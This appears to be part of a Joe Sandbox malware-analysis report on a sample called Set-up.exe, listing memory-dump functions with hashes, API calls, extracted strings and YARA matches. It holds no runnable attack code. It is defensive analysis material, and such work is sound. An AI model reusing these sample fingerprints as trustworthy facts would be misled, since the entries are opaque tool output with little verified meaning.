                                                                                                                                                  • Instruction ID: be180d5f8d8f9151850531fd3683c1bdd0a275f8383a28fa4f8b6c3759c234cb
                                                                                                                                                  • Opcode Fuzzy Hash: bbe4ec4a255a3f98e1cd5822909672a01be13502a7264827bf40e526fdf13f75
                                                                                                                                                  • Instruction Fuzzy Hash: B2E1B221D087E98EDB22C67C88043DDBFB15B53324F0842DDD4E9AB3D2D6754A86CB66
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: !$000$001$R$Unknown error$a$exe$iso$r$rar$wR@
                                                                                                                                                  • API String ID: 3519838083-283078084
                                                                                                                                                  • Opcode ID: 2ab122cc93271be7a269a58e2ea853c288add0570733aacf28cc4cd3a81a773b
                                                                                                                                                  • Instruction ID: 559301500c5c599910b2af14fbdd2b456b682ead41d4de31ff4558aa113e3007
                                                                                                                                                  • Opcode Fuzzy Hash: 2ab122cc93271be7a269a58e2ea853c288add0570733aacf28cc4cd3a81a773b
                                                                                                                                                  • Instruction Fuzzy Hash: 9352A070D00248DFCF15DF95C8849EEBBB5BF49314F24805EE845AB291DB38AA85CB65
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004415D7
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000000,00000004,00000004,00010000,?,00000001), ref: 00441E42
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00441EAC
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00441EF0
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004423AD
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00442460
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004424FF
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                                                                  • String ID: D
                                                                                                                                                  • API String ID: 2532973370-2746444292
                                                                                                                                                  • Opcode ID: c7c2732c37a64ada520d63ac1eee0b237546949b15254c05d830259176227b0d
                                                                                                                                                  • Instruction ID: 744c9ab89cf9137cc2ef17180ac8af806b2d9bec3cba67278ea5f98f0c2327ee
                                                                                                                                                  • Opcode Fuzzy Hash: c7c2732c37a64ada520d63ac1eee0b237546949b15254c05d830259176227b0d
                                                                                                                                                  • Instruction Fuzzy Hash: 1EC28F30D00249DFEF15DFA5C994AEDBBB0AF18308F54809EE44977292DB786E49CB25
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: +$0$5$8$;$M$Q$V$n$p$t$x$~
                                                                                                                                                  • API String ID: 0-2101947778
                                                                                                                                                  • Opcode ID: 9e3cc43065536aba71e4522b174f673995bc24f7ed32f5e3673851162d1488cc
                                                                                                                                                  • Instruction ID: faea19e4f3ee39603092b8e1e31464c6c2d55079bc79675b2177d88c8c6ec266
                                                                                                                                                  • Opcode Fuzzy Hash: 9e3cc43065536aba71e4522b174f673995bc24f7ed32f5e3673851162d1488cc
                                                                                                                                                  • Instruction Fuzzy Hash: 8782D47160C7818BD768DF38C4553AEBBE6ABC6310F188A6DE4DAC7781DA788545CB03
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: H$L$R$X$Y$\$]$b$e$o$u
                                                                                                                                                  • API String ID: 0-3293963407
                                                                                                                                                  • Opcode ID: 629a7586417e11de94fc3bed3a8fa46ca99d91ef8292f3c5d3ba24b48ce1c4df
                                                                                                                                                  • Instruction ID: c1b5e1e0fc6cbf2c66db48425649ba66766559230f4c50188e2b30731643c35b
                                                                                                                                                  • Opcode Fuzzy Hash: 629a7586417e11de94fc3bed3a8fa46ca99d91ef8292f3c5d3ba24b48ce1c4df
                                                                                                                                                  • Instruction Fuzzy Hash: DE32F77260C7918FD724DF38C4953AEBBE6AFC5320F198A2DE8D987781D67489058B43
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: !$gsf}$nm58$tk$b6`$fd$j>h$n<l$q9$rp$zx
                                                                                                                                                  • API String ID: 0-3075877772
                                                                                                                                                  • Opcode ID: 8068924df7d453fa80d1f2c3978f0f56409acb30b62bec71ae9f023ecdcbb8fe
                                                                                                                                                  • Instruction ID: b3e006a2ce49a5156d68c0ff3939266bbd0a41f08c410f6245d74e0cfa988de6
                                                                                                                                                  • Opcode Fuzzy Hash: 8068924df7d453fa80d1f2c3978f0f56409acb30b62bec71ae9f023ecdcbb8fe
                                                                                                                                                  • Instruction Fuzzy Hash: C4C14772B4C3504BC724EF2884512AFFBD39BC1320F1D8A2DE4D55B345EA75890ADBA6
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,004708E5,?,Microsoft Visual C++ Runtime Library,00012010,?,0047CFDC,?,0047D02C,?,?,?,Runtime Error!Program: ), ref: 004716E6
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004716FE
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0047170F
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0047171C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                  • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                  • API String ID: 2238633743-4044615076
                                                                                                                                                  • Opcode ID: f125fcbf0fee655512f86ecf22a5b49b386ac9a16d47b26feedca856e97d2195
                                                                                                                                                  • Instruction ID: 03b784820acf36e0d5b112930b3f3e770f5cd8d131891af01fb093e386284952
                                                                                                                                                  • Opcode Fuzzy Hash: f125fcbf0fee655512f86ecf22a5b49b386ac9a16d47b26feedca856e97d2195
                                                                                                                                                  • Instruction Fuzzy Hash: C9017131600301BB87109FB9AC84A9B7AB8EA9D761711883BF509D3221E678C9519B69
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: X,^$Tuj$!d<z$"\;R$&D9Z$(x.~$6P'V$WT$\$\]^_
                                                                                                                                                  • API String ID: 0-2679386696
                                                                                                                                                  • Opcode ID: ce75bc5280868d48a70c87ba81e8fe79248b11eaeb1aa40c134f5f8797cf4a3e
                                                                                                                                                  • Instruction ID: 08d81f7beef9190cd16290b1c784d9c531ace1e45db77b833b4b6afbf176860a
                                                                                                                                                  • Opcode Fuzzy Hash: ce75bc5280868d48a70c87ba81e8fe79248b11eaeb1aa40c134f5f8797cf4a3e
                                                                                                                                                  • Instruction Fuzzy Hash: C922FFB26083009FD714CF25C841BABBBE2EFC5714F188A2DE6959B291DB75D842CB52
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $!$!@$&$,$L$M$N$O$s
                                                                                                                                                  • API String ID: 0-659037545
                                                                                                                                                  • Opcode ID: 1b24b55bd2d98d8d417b75fe6a997a600d89fa01a4e7b94792926a4dae59bbab
                                                                                                                                                  • Instruction ID: fc8027c3569ca0ca869ce8b3854e6fd426cfb3b77c14486c40c16ae5040be85f
                                                                                                                                                  • Opcode Fuzzy Hash: 1b24b55bd2d98d8d417b75fe6a997a600d89fa01a4e7b94792926a4dae59bbab
                                                                                                                                                  • Instruction Fuzzy Hash: 0422F57160C7A08FD324AB28C45036EBBD2AF86324F188A6EF5D5873D2D7798945CB07
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: JCzK$Jsx}$O$[@#$e@#$rGyD$
                                                                                                                                                  • API String ID: 0-1983846096
                                                                                                                                                  • Opcode ID: c8a4e0418af1c7a1d3b4a903dd315ee5dfa0423e0a724264cb78d25a29d1a60d
                                                                                                                                                  • Instruction ID: 796c9eb3902c79848c8cc93481313a0072c15aa61a78814fe0c8926c628b5b78
                                                                                                                                                  • Opcode Fuzzy Hash: c8a4e0418af1c7a1d3b4a903dd315ee5dfa0423e0a724264cb78d25a29d1a60d
                                                                                                                                                  • Instruction Fuzzy Hash: C1D146726483408FD328DF64C8516ABBBE2EFC5304F188A3DE5E59B351D779C9068B46
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00430F9D
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004315C7
                                                                                                                                                    • Part of subcall function 0042AF58: __EH_prolog.LIBCMT ref: 0042AF5D
                                                                                                                                                    • Part of subcall function 00427FF7: __EH_prolog.LIBCMT ref: 00427FFC
                                                                                                                                                    • Part of subcall function 00427AD2: __EH_prolog.LIBCMT ref: 00427AD7
                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0043155F
                                                                                                                                                    • Part of subcall function 004331F5: __EH_prolog.LIBCMT ref: 004331FA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$FreeString
                                                                                                                                                  • String ID: )
                                                                                                                                                  • API String ID: 397689101-2427484129
                                                                                                                                                  • Opcode ID: 66ae192ca94e929d363032ca5ed6df6dd29a866ddee8f685c5fb873ab73fc87d
                                                                                                                                                  • Instruction ID: 55e50db3bde0b93fa2859163b83da77aa776ba8142f5ffca2a3a6a21f7676ec7
                                                                                                                                                  • Opcode Fuzzy Hash: 66ae192ca94e929d363032ca5ed6df6dd29a866ddee8f685c5fb873ab73fc87d
                                                                                                                                                  • Instruction Fuzzy Hash: 06037B30904259DFDB15DFA4C984BEDBBB0BF58308F14809EE80967292DB78AE45CF65
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 8$8$9$9$:$:
                                                                                                                                                  • API String ID: 0-1811065620
                                                                                                                                                  • Opcode ID: 2b10ca1e912bf5d38e4d2a778b46d5ca3d6dd4a67a15562ef3a98cf72f0bc413
                                                                                                                                                  • Instruction ID: e4ed8889fdf37271a43977dae774a845936885a3ad2e03fb08dfc09fbeb9219a
                                                                                                                                                  • Opcode Fuzzy Hash: 2b10ca1e912bf5d38e4d2a778b46d5ca3d6dd4a67a15562ef3a98cf72f0bc413
                                                                                                                                                  • Instruction Fuzzy Hash: 1A914872A087D48FDB02CABCC8406EE7FA75BA7260F1D8295D4A19B3D6C6358907C761
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: \$]$nPTO$q|$uws
                                                                                                                                                  • API String ID: 0-364134478
                                                                                                                                                  • Opcode ID: 5a56bc40129c12e6e675d48b8044640103d0c2ab49d18cdc3d306846cb285dcd
                                                                                                                                                  • Instruction ID: 5957c6e39b455a67e5fff18731c42df2a0df030b764dd8511828b17da07dd32f
                                                                                                                                                  • Opcode Fuzzy Hash: 5a56bc40129c12e6e675d48b8044640103d0c2ab49d18cdc3d306846cb285dcd
                                                                                                                                                  • Instruction Fuzzy Hash: E3C1297054C3D18BD326DF7988903AABFE1AF93204F0886ADE8D58B742D625C909C793
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $;J$$$O$2[&%$d_$h
                                                                                                                                                  • API String ID: 0-2343494447
                                                                                                                                                  • Opcode ID: cd1948c1564e5a044629e6db35d8d28aabe4d8e906e0bb4e8cc043bb17311e1c
                                                                                                                                                  • Instruction ID: 07ed5d8df75a2d5e18d964bdfb7040b80c3da1ab8fd8316dad41e69c21b1d0ee
                                                                                                                                                  • Opcode Fuzzy Hash: cd1948c1564e5a044629e6db35d8d28aabe4d8e906e0bb4e8cc043bb17311e1c
                                                                                                                                                  • Instruction Fuzzy Hash: B791F0B690E3E08BD735DF2588903DABBE2ABD7300F198A5CC8D91B745CB354905CB92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: IK$-E*G$4A0C$5M=O$8U$W
                                                                                                                                                  • API String ID: 0-3368978884
                                                                                                                                                  • Opcode ID: 40a3c90cdef32a88a17be069de21465ccc6ccbe9e824139b187e315834951677
                                                                                                                                                  • Instruction ID: 3a7cf4d0a7e174c920793e927dc75eec11ca0bd790289dc76c32358888d3fa74
                                                                                                                                                  • Opcode Fuzzy Hash: 40a3c90cdef32a88a17be069de21465ccc6ccbe9e824139b187e315834951677
                                                                                                                                                  • Instruction Fuzzy Hash: B96176B65193858BD7388F2588923EBBBF2AFC2310F559A1DC5DC4B394EB344102CB86
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040A32B
                                                                                                                                                    • Part of subcall function 0040A306: FindClose.KERNEL32(00000000,?,0040A33F,?), ref: 0040A311
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?), ref: 0040A366
                                                                                                                                                    • Part of subcall function 0040A46F: __EH_prolog.LIBCMT ref: 0040A474
                                                                                                                                                  • FindFirstFileW.KERNEL32(000000FF,?,?,?), ref: 0040A39D
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000002,?,00000003,?,?), ref: 0040A3D5
                                                                                                                                                    • Part of subcall function 004077C9: __EH_prolog.LIBCMT ref: 004077CE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$FileFirstH_prolog$Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3335342080-0
                                                                                                                                                  • Opcode ID: 93edfc412da073c259e67a16ef3f2889237f69dc041aee4828ddcd9f86077aeb
                                                                                                                                                  • Instruction ID: 6a200a5ec5d7373b00856f3de2735c03a490f03ca145da7cddf519ce353b4b94
                                                                                                                                                  • Opcode Fuzzy Hash: 93edfc412da073c259e67a16ef3f2889237f69dc041aee4828ddcd9f86077aeb
                                                                                                                                                  • Instruction Fuzzy Hash: BA218D7180030A9FCB10EFA4C9819AEB774EF10328F10467EE991B72D1D7385A95DF96
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ]$qkrh$uqT^$uqT^
                                                                                                                                                  • API String ID: 0-2178738942
                                                                                                                                                  • Opcode ID: ef0f00bf9d89bcb2dccdb7778b9b516b20b323598f0f1bb1660b8671dcd639f8
                                                                                                                                                  • Instruction ID: cd1da65e27fb81f4bf789c9f044f6adf886ed6a20db615e0211a0696823bfb15
                                                                                                                                                  • Opcode Fuzzy Hash: ef0f00bf9d89bcb2dccdb7778b9b516b20b323598f0f1bb1660b8671dcd639f8
                                                                                                                                                  • Instruction Fuzzy Hash: 01B1037190C3818BD739CF6984503ABBBD2AFE7301F1889ADD0C997342D678890A8B56
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040A916
                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000003,75923220,00000002,00000000), ref: 0040A9D4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CurrentDirectoryH_prolog
                                                                                                                                                  • String ID: \\?\
                                                                                                                                                  • API String ID: 1365920442-4282027825
                                                                                                                                                  • Opcode ID: 64cf4edc2a30621b89928218fdd3293bb144456b2e7b0c06e2e75b4925b2a9cd
                                                                                                                                                  • Instruction ID: bb1f149a2e02795a9a8a9760b0b863e3b8fe5f3dd2ec99aff929411e55c5b8fd
                                                                                                                                                  • Opcode Fuzzy Hash: 64cf4edc2a30621b89928218fdd3293bb144456b2e7b0c06e2e75b4925b2a9cd
                                                                                                                                                  • Instruction Fuzzy Hash: 414177B0E002059ADF24AB99D909AEFB6B4EF04308F10843FE415B22D1D7785A95CB6B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 01$Sp0v$c`$|r
                                                                                                                                                  • API String ID: 0-501639292
                                                                                                                                                  • Opcode ID: 7a04ff4bb80d7d49d2862254d0fae8460f622d27709ec53bd254e19bbfd9ef05
                                                                                                                                                  • Instruction ID: 2a36a91bb9e7b28a8c223501ea96efaf09c7e2596e1739f7f9c4dca584673615
                                                                                                                                                  • Opcode Fuzzy Hash: 7a04ff4bb80d7d49d2862254d0fae8460f622d27709ec53bd254e19bbfd9ef05
                                                                                                                                                  • Instruction Fuzzy Hash: 70912672A5D3404BD714DF66CC8216BFBE3EBD1304F09992CE49597701D679C60ACB8A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: =]Qb$=]Qb$A\hV$D
                                                                                                                                                  • API String ID: 0-3858663925
                                                                                                                                                  • Opcode ID: 4b01b1de75f1331a32b0e76f98a5f46ccd5c2ace1ceec5172429e2d5eda47058
                                                                                                                                                  • Instruction ID: ff5e09b957afa2b7a70ad0496ef4d37212f4d7c3b814092665f60db38408b9f5
                                                                                                                                                  • Opcode Fuzzy Hash: 4b01b1de75f1331a32b0e76f98a5f46ccd5c2ace1ceec5172429e2d5eda47058
                                                                                                                                                  • Instruction Fuzzy Hash: 9A412B2450E3E04BDB359B3984643FBBBE19F97300F58899DC4EB9B682C7384806DB56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: =]Qb$=]Qb$A\hV$D
                                                                                                                                                  • API String ID: 0-3858663925
                                                                                                                                                  • Opcode ID: 0c0a05dfb651b4e2fe3b02c1993ca1a12b4be99aab263749b0dbf5d2bb995b72
                                                                                                                                                  • Instruction ID: 7e54d2aa24be635aab1782f5836bc5e4eb97a5e7bb3d09b8e708d1eb05ba6c1a
                                                                                                                                                  • Opcode Fuzzy Hash: 0c0a05dfb651b4e2fe3b02c1993ca1a12b4be99aab263749b0dbf5d2bb995b72
                                                                                                                                                  • Instruction Fuzzy Hash: 3E410B3450E3E04BDB359B3584683F6BFE19F57204F18859DC4EA9B682D6394406CF16
                                                                                                                                                  APIs
                                                                                                                                                  • DeviceIoControl.KERNEL32(00000000,00074004,00000000,00000000,?,00000020,?,00000000), ref: 0040ACCE
                                                                                                                                                  • DeviceIoControl.KERNEL32(000000FF,00070000,00000000,00000000,?,00000018,?,00000000), ref: 0040ACF6
                                                                                                                                                  • DeviceIoControl.KERNEL32(000000FF,0002404C,00000000,00000000,?,00000018,?,00000000), ref: 0040AD10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ControlDevice
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2352790924-0
                                                                                                                                                  • Opcode ID: e8aa8b4561201d60a5efdcdfdbfa367fe20721bcb8b3029522f9d1ea03035a5b
                                                                                                                                                  • Instruction ID: d718745783e3cb463aa1acb90b86b9590feaef4db95924803e45ef075d9d51ce
                                                                                                                                                  • Opcode Fuzzy Hash: e8aa8b4561201d60a5efdcdfdbfa367fe20721bcb8b3029522f9d1ea03035a5b
                                                                                                                                                  • Instruction Fuzzy Hash: 3E21A1B2900308BEEB20DB95CC80EEBB7FCEF44344B10C42AF255E7690D235AD049B65
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: W
                                                                                                                                                  • API String ID: 3519838083-655174618
                                                                                                                                                  • Opcode ID: 4fdcc663f33c2bb8ae08789204201649e2f6217ce026bb4d3a4cfd124e4be867
                                                                                                                                                  • Instruction ID: 559c76734682755b776942833229c822618f41af8f5b274c9f563cb15ad09f6c
                                                                                                                                                  • Opcode Fuzzy Hash: 4fdcc663f33c2bb8ae08789204201649e2f6217ce026bb4d3a4cfd124e4be867
                                                                                                                                                  • Instruction Fuzzy Hash: 35926C70D04249DFDF15CFA8C594BAEBBB4BF48304F18409AE845AB382DB78AD45CB65
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ,y){$qU&W$qU&W
                                                                                                                                                  • API String ID: 0-3925510882
                                                                                                                                                  • Opcode ID: 58ec0d0f056e60a5121d26fa80f1a4fdae9498629de792f961f905ef0c2d1959
                                                                                                                                                  • Instruction ID: 12a81f70b3612e29a08cfe0cc3711502e0b4951a6ecdc80505e7ce4c718f848c
                                                                                                                                                  • Opcode Fuzzy Hash: 58ec0d0f056e60a5121d26fa80f1a4fdae9498629de792f961f905ef0c2d1959
                                                                                                                                                  • Instruction Fuzzy Hash: FDF165729083228BCB24CF24C4912ABB7F2FFA5354F19856DD8C45B3A5E7358D42C796
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: -JH$C=|?$RP
                                                                                                                                                  • API String ID: 0-907785316
                                                                                                                                                  • Opcode ID: 8cf7f876c48ebd3e18f72044d9c598cbb11cdfb2f0e8d5ec215832c29b18f262
                                                                                                                                                  • Instruction ID: ac317cbc9f678aade5a7eec5a26e832c1f0a853f742ef02e6464ccd8dc153a74
                                                                                                                                                  • Opcode Fuzzy Hash: 8cf7f876c48ebd3e18f72044d9c598cbb11cdfb2f0e8d5ec215832c29b18f262
                                                                                                                                                  • Instruction Fuzzy Hash: 069126715083108BCB14DF28C8A26AB77F6EF96324F088A5CE4D68B7D1E735DA09C756
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Offset: 00680000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_680000_Set-up.jbxd
